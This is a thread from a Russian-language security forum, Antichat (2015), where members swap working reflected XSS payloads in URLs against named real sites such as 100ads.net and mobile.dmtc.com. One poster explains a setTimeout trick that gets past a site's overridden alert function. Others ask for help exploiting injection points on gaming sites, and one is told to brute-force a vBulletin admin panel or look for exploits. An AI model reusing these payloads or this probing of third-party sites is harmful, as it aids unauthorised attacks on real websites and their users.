HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #331  
Старый 13.07.2015, 01:40
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Xss есть, почитай js файлы, prompt работает

http://100ads.net/registration/?a=0&refererNickname=">prompt()
 
Ответить с цитированием

  #332  
Старый 13.07.2015, 04:18
3ran
Guest
Сообщений: n/a
Провел на форуме:
7728

Репутация: 5
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
А ты думал достаточно просто найти админку?)

Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.

Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
 
Ответить с цитированием

  #333  
Старый 13.07.2015, 14:07
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Цитата:
Сообщение от EoGeneo  
EoGeneo said:

можно
Подскажи пжл как такой скрипт составить.
 
Ответить с цитированием

  #334  
Старый 13.07.2015, 14:27
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от 3ran  
3ran said:

А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .
 
Ответить с цитированием

  #335  
Старый 13.07.2015, 18:47
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

http://mobile.dmtc.com/index.php?vid...s/2010-08/08/8'

Можно что нибудь сделать?
 
Ответить с цитированием

  #336  
Старый 13.07.2015, 18:50
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

http://mobile.dmtc.com/index.php?vid...s/2010-08/08/8
'
Можно что нибудь сделать?
нет
 
Ответить с цитированием

  #337  
Старый 13.07.2015, 23:54
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Действительно срабатывает.

Цитата:
Сообщение от OxoTnik  
OxoTnik said:

нет
Можно.

XSS уязвимость.

$url = "http://mobile.dmtc.com/index.php?vid...s/2010-08/08/8\'";

$referer = "\">alert(/antichat/);";
 
Ответить с цитированием

  #338  
Старый 14.07.2015, 13:15
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

я пока сам не понял в чем дело, однако prompt() срабатывает:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...

Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E
 
Ответить с цитированием

  #339  
Старый 14.07.2015, 15:22
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264

Репутация: 69
Отправить сообщение для RedFern.89 с помощью ICQ
По умолчанию

Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку

Код:
Code:
http://navi-gaming.com/en/achievements?id[]=71
Код:
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
 
Ответить с цитированием

  #340  
Старый 15.07.2015, 00:49
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Цитата:
Сообщение от frank  
frank said:

И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E
Вот так работает:

Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22
Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ